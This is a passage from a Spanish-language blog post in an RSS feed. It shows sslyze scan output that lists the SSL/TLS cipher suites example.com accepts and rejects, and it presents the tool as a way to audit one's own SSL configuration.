<blockquote><p>REGISTERING AVAILABLE PLUGINS  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>PluginOpenSSLCipherSuites &#8211; OK    PluginSessionResumption &#8211; OK    PluginCertInfo &#8211; OK    PluginEmpty &#8211; OK    PluginSessionRenegotiation &#8211; OK</p>
<p>CHECKING HOST(S) AVAILABILITY  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>example.com:443                  =&gt; example.com:443</p>
<p>SCAN RESULTS FOR example.com:443 &#8211; example.com:443  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>* TLSV1 Cipher Suites :       Cipher Suite:                             SSL Handshake:           HTTP GET:       DHE-RSA-AES256-SHA  256bits                  Preferred               200 OK        RC4-SHA  128bits                             Accepted                200 OK        RC4-MD5  128bits                             Accepted                200 OK        EXP-RC4-MD5  40bits                          Accepted                200 OK        EXP-RC2-CBC-MD5  40bits                      Accepted                200 OK        EXP-EDH-RSA-DES-CBC-SHA  40bits              Accepted                200 OK        EXP-DES-CBC-SHA  40bits                      Accepted                200 OK        EDH-RSA-DES-CBC3-SHA  168bits                Accepted                200 OK        EDH-RSA-DES-CBC-SHA  56bits                  Accepted                200 OK        DHE-RSA-AES128-SHA  128bits                  Accepted                200 OK        DES-CBC3-SHA  168bits                        Accepted                200 OK        DES-CBC-SHA  56bits                          Accepted                200 OK        AES256-SHA  256bits                          Accepted                200 OK        AES128-SHA  128bits                          Accepted                200 OK        NULL-SHA                               Rejected &#8211; SSL Alert           N/A          NULL-MD5                               Rejected &#8211; SSL Alert           N/A          EXP-EDH-DSS-DES-CBC-SHA                Rejected &#8211; SSL Alert           N/A          EXP-ADH-RC4-MD5                        Rejected &#8211; SSL Alert           N/A          EXP-ADH-DES-CBC-SHA                    Rejected &#8211; SSL Alert           N/A          EDH-DSS-DES-CBC3-SHA                   Rejected &#8211; SSL Alert           N/A          EDH-DSS-DES-CBC-SHA                    Rejected &#8211; SSL Alert           N/A          DHE-DSS-AES256-SHA                     Rejected &#8211; SSL Alert           N/A          DHE-DSS-AES128-SHA                     Rejected &#8211; SSL Alert           N/A          ADH-RC4-MD5                            Rejected &#8211; SSL Alert           N/A          ADH-DES-CBC3-SHA                       Rejected &#8211; SSL Alert           N/A          ADH-DES-CBC-SHA                        Rejected &#8211; SSL Alert           N/A          ADH-AES256-SHA                         Rejected &#8211; SSL Alert           N/A          ADH-AES128-SHA                         Rejected &#8211; SSL Alert           N/A</p>
<p>* SSLV3 Cipher Suites :       Cipher Suite:                             SSL Handshake:           HTTP GET:       DHE-RSA-AES256-SHA  256bits                  Preferred               200 OK        RC4-SHA  128bits                             Accepted                200 OK        RC4-MD5  128bits                             Accepted                200 OK        EXP-RC4-MD5  40bits                          Accepted                200 OK        EXP-RC2-CBC-MD5  40bits                      Accepted                200 OK        EXP-EDH-RSA-DES-CBC-SHA  40bits              Accepted                200 OK        EXP-DES-CBC-SHA  40bits                      Accepted                200 OK        EDH-RSA-DES-CBC3-SHA  168bits                Accepted                200 OK        EDH-RSA-DES-CBC-SHA  56bits                  Accepted                200 OK        DHE-RSA-AES128-SHA  128bits                  Accepted                200 OK        DES-CBC3-SHA  168bits                        Accepted                200 OK        DES-CBC-SHA  56bits                          Accepted                200 OK        AES256-SHA  256bits                          Accepted                200 OK        AES128-SHA  128bits                          Accepted                200 OK        NULL-SHA                               Rejected &#8211; SSL Alert           N/A          NULL-MD5                               Rejected &#8211; SSL Alert           N/A          EXP-EDH-DSS-DES-CBC-SHA                Rejected &#8211; SSL Alert           N/A          EXP-ADH-RC4-MD5                        Rejected &#8211; SSL Alert           N/A          EXP-ADH-DES-CBC-SHA                    Rejected &#8211; SSL Alert           N/A          EDH-DSS-DES-CBC3-SHA                   Rejected &#8211; SSL Alert           N/A          EDH-DSS-DES-CBC-SHA                    Rejected &#8211; SSL Alert           N/A          DHE-DSS-AES256-SHA                     Rejected &#8211; SSL Alert           N/A          DHE-DSS-AES128-SHA                     Rejected &#8211; SSL Alert           N/A          ADH-RC4-MD5                            Rejected &#8211; SSL Alert           N/A          ADH-DES-CBC3-SHA                       Rejected &#8211; SSL Alert           N/A          ADH-DES-CBC-SHA                        Rejected &#8211; SSL Alert           N/A          ADH-AES256-SHA                         Rejected &#8211; SSL Alert           N/A          ADH-AES128-SHA                         Rejected &#8211; SSL Alert           N/A</p>
<p>* SSLV2 Cipher Suites :       Cipher Suite:                             SSL Handshake:           HTTP GET:       DES-CBC3-MD5  168bits                        Preferred               200 OK        RC4-MD5  128bits                             Accepted                200 OK        RC2-CBC-MD5  128bits                         Accepted                200 OK        EXP-RC4-MD5  40bits                          Accepted                200 OK        EXP-RC2-CBC-MD5  40bits                      Accepted                200 OK        DES-CBC-MD5  56bits                          Accepted                200 OK</p>
<p>SCAN COMPLETED IN 2.10 S  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p></blockquote>
<p>En este caso podemos negociar cualquiera de los certificados</p>
<p>Ya tenéis otra herramienta para testear tu seguridad ssl.</p>
<p>Saludos cordiales</p>
<br />Filed under: <a href='http://seifreed.com/category/seguridad/'>Seguridad</a> Tagged: <a href='http://seifreed.com/tag/certificados/'>Certificados</a>, <a href='http://seifreed.com/tag/seguridad/'>Seguridad</a>, <a href='http://seifreed.com/tag/ssl/'>SSL</a>, <a href='http://seifreed.com/tag/sslyze/'>sslyze</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/3999/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/3999/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/3999/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/3999/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/3999/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/3999/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/3999/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/3999/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/3999/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/3999/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/3999/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/3999/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/3999/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/3999/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=3999&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2011/12/27/sslyze-comprueba-la-configuracion-de-tu-ssl/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>
	</item>
	</channel>
</rss>
